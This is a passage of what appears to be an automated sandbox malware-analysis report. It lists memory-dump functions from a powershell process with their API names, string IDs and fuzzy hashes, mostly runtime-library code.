                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                        • API String ID: 0-2766056989
                                                                                                                                                                                                                                                        • Opcode ID: bd16b1dcfee64a83d44fd459ce83864fc9860fa420ce6bd58e04af224ccac92a
                                                                                                                                                                                                                                                        • Instruction ID: cdb07cefaad72c0a4d489f3ba6f25cf2f1844a2e5009272d3c197ce4e495a0f5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd16b1dcfee64a83d44fd459ce83864fc9860fa420ce6bd58e04af224ccac92a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5418DA2724B4586EA44CF2AE4159A973A1FB4CFC0B499436DE0E87794EF3CD642C304
                                                                                                                                                                                                                                                        Function 00007FFB0815CF34 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                                        • Opcode ID: c6899769eec3392675c083dbbdceee7a3bc0c6fb5ea160dc4d49b7bc8847e0ed
                                                                                                                                                                                                                                                        • Instruction ID: 47b117ded7b42340f5a875f67ea85d945503ba6d8b86b7e80131c6d4f3d46c18
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6899769eec3392675c083dbbdceee7a3bc0c6fb5ea160dc4d49b7bc8847e0ed
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2B09260E0BA02D6EB882B61AC82A1422A4BFAC700F98903CC64C80320DE2C62F59704
                                                                                                                                                                                                                                                        Function 00007FFB08164210 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2af76e661b361c591c786cbc38084e845e543554ff367becd91e8c751874bf27
                                                                                                                                                                                                                                                        • Instruction ID: 0bb2f416eb0632faf2f940226d2962d1744b8f07c1780ce3642f08dfa4cfbee0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2af76e661b361c591c786cbc38084e845e543554ff367becd91e8c751874bf27
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88F0F4B1A186559AEB948F29E453A2977E0EB48385B50C07DD68D83B14D63CD5A1CF08
                                                                                                                                                                                                                                                        Function 00007FFB0815B0E0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 197COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: $ $ $ $ $=$UTF-16LEUNICODE$UTF-8$a$ccs$r$w
                                                                                                                                                                                                                                                        • API String ID: 3215553584-2974328796
                                                                                                                                                                                                                                                        • Opcode ID: 06cde6739c57616d6a4d564ab4d2fdca326f5b9e6237714cf1d81c389a9bdb89
                                                                                                                                                                                                                                                        • Instruction ID: d7de09661988faf300ce908adf2153d866c9d1f8e00f9eb5108ff882c351cc9e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06cde6739c57616d6a4d564ab4d2fdca326f5b9e6237714cf1d81c389a9bdb89
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF717DF2D0C246D9FBA94E34D665F3C2A90AF1A764F489034CA5E425D1CB2CF660D719
                                                                                                                                                                                                                                                        Function 00007FFB0815A0C4 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                                                                        • API String ID: 3215553584-2617248754
                                                                                                                                                                                                                                                        • Opcode ID: 8aec6002f043121e6ef06b5e3c009d55a91354f812a4893e5620ab7977df9798
                                                                                                                                                                                                                                                        • Instruction ID: 99a1a1d34bfd8e2bc840975ce18dde71d191d58e53610f1266b353debb2716f4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8aec6002f043121e6ef06b5e3c009d55a91354f812a4893e5620ab7977df9798
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 554180B2A15B55C9E704CF35E851BAA33A4EF08798F00463AEE9D47B94DE3CD265C348
                                                                                                                                                                                                                                                        Function 00007FFB08157F20 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 488COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: +$-
                                                                                                                                                                                                                                                        • API String ID: 3215553584-2137968064
                                                                                                                                                                                                                                                        • Opcode ID: 4fc85b756b8e41a38268a51f45499bfb1c56a3397ba7098fc8daba54cfe89452
                                                                                                                                                                                                                                                        • Instruction ID: c79377aecb5ce0be3da4131bfdf5f8220baaca354254800b72b34dba838986bd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4fc85b756b8e41a38268a51f45499bfb1c56a3397ba7098fc8daba54cfe89452
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B12D1A5E19543C5FB20AB39D054ABA7696EF18764FD84132DAAE436C0DF2DE781C30C
                                                                                                                                                                                                                                                        Function 00007FFB08156D74 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                        • Opcode ID: 70a4e03671fe078560fd172ed2091eae3513ecf4c325202d8039c188f258cab6
                                                                                                                                                                                                                                                        • Instruction ID: 507d9a97419a9c2839fb10fdc9c5f24db7aac334dcfaffe69530cac1fa4e22c6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70a4e03671fe078560fd172ed2091eae3513ecf4c325202d8039c188f258cab6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3F0C2A1B1CA4295EF448B31F494A792360EFACBD0F480439D98F4226CDE3CD6A8C704
                                                                                                                                                                                                                                                        Function 00007FFB08160794 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3659116390-0
                                                                                                                                                                                                                                                        • Opcode ID: 540f11c47178f2a1052fd8004de361fdc895ccaf606f2fedb759d09346051b8b
                                                                                                                                                                                                                                                        • Instruction ID: 7b8a4310566c02a2bfe461f15645245a9e076e9fe3c45d98d915caa4948d611f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 540f11c47178f2a1052fd8004de361fdc895ccaf606f2fedb759d09346051b8b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F51BBA2A24A51C9F710CB75E444BAC3BB1BF4CB98F048135CE8E57A99CF38D651C704
                                                                                                                                                                                                                                                        Function 00007FFB0815B674 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,0000000E,00007FFB0815B99B,?,?,00000000,00007FFB081596C7,?,?,Z:\syscalls\amsi_trace64.amsi.csv,00007FFB08158B59), ref: 00007FFB0815B796
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressProc
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 190572456-0
                                                                                                                                                                                                                                                        • Opcode ID: c7be80c23b5652cd02d9dd81a8268e1b7a8c742f80f4306acf3a81f06366391b
                                                                                                                                                                                                                                                        • Instruction ID: e7a1aea07dd77c962df7ceca59b98816fc281378ac243a00071ade1e2265ba3a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7be80c23b5652cd02d9dd81a8268e1b7a8c742f80f4306acf3a81f06366391b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA41AEA1B0EA42D6FA158B66E804DB56295BF5CBE0F094535DE1D8B784EF3CE640C248
                                                                                                                                                                                                                                                        Function 00007FFB0815B418 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharErrorLastMultiWide$AllocHeap_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2395940807-0
                                                                                                                                                                                                                                                        • Opcode ID: 7b7003592a060987504490bb3c227e6761ceb49c73b0cdeb07c95449ae387ee8
                                                                                                                                                                                                                                                        • Instruction ID: ddc8a1102dbc12aa4e98e3e1ac536504cac06fa564194abc0a81003e6e9a211b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b7003592a060987504490bb3c227e6761ceb49c73b0cdeb07c95449ae387ee8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6321B6B1A0CB42C5EA249F76E80097AA695BF9C7E0F084535ED9E437D6DF3CE241C208
                                                                                                                                                                                                                                                        Function 00007FFB08164004 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                                                        • Opcode ID: c8b051e27b68c6b043da78d9bda75542202bddee0f68464aef4353d6aee2ea9e
                                                                                                                                                                                                                                                        • Instruction ID: 0de7923d27e2d462f2412ec1e8116b2a2eb4c82e39979a331584bc5dc06d5b9c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8b051e27b68c6b043da78d9bda75542202bddee0f68464aef4353d6aee2ea9e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59118FA6E1C6234DFA9811B9E542BB910516F5D3B0F194634EAEE475DA8E2CE660C10C
                                                                                                                                                                                                                                                        Function 00007FFB0815407C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: $*
                                                                                                                                                                                                                                                        • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                                                        • Opcode ID: 7921fb40f14054158449190623780c3816d48f96616917c8b17a3b50cdd8f704
                                                                                                                                                                                                                                                        • Instruction ID: cd627a2582e621f58eb99601d774b2b0099890490676f6eefdec4eceb4987983
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7921fb40f14054158449190623780c3816d48f96616917c8b17a3b50cdd8f704
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73514FF290C252CAE7688E38E094B7C3BA1FF19B59F141135CA4E46299CF38E6C1D60D
                                                                                                                                                                                                                                                        Function 00007FFB08160BC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                                        • API String ID: 2456169464-4171548499
                                                                                                                                                                                                                                                        • Opcode ID: b8accaed45b6bdfcbad153107dbcd900d0bf98f43f16f2e3626ca5acfeb02b80
                                                                                                                                                                                                                                                        • Instruction ID: 0919950c0b8ff0b7b1a764409e5ea99b32ae3c53b9e78e1f9a312541e24eb733
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8accaed45b6bdfcbad153107dbcd900d0bf98f43f16f2e3626ca5acfeb02b80
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A41B262A19A818ADB208F25E444BAA67A0FF9C784F404131EE8D97784DF3CD651C748
                                                                                                                                                                                                                                                        Function 00007FFAAC5B8533 Relevance: 6.3, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1406557466.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffaac5b0000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: K_^$K_^$K_^$K_^$K_^
                                                                                                                                                                                                                                                        • API String ID: 0-3188868157
                                                                                                                                                                                                                                                        • Opcode ID: ed1404a15e67343acf2cce012912c658ecd3d9ecc7085c7e0f1abfaf17d03cb2
                                                                                                                                                                                                                                                        • Instruction ID: 409c87847553df5c375ec803d4292c25a96343840ec6ca94aba96999e59400ba
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed1404a15e67343acf2cce012912c658ecd3d9ecc7085c7e0f1abfaf17d03cb2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42215E93E1E6C39EE747433948690D16FD0AE9726875E83E6C0D88B4E7EA18840BD395
                                                                                                                                                                                                                                                        Function 00007FFB08161688 Relevance: 6.2, APIs: 4, Instructions: 160COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
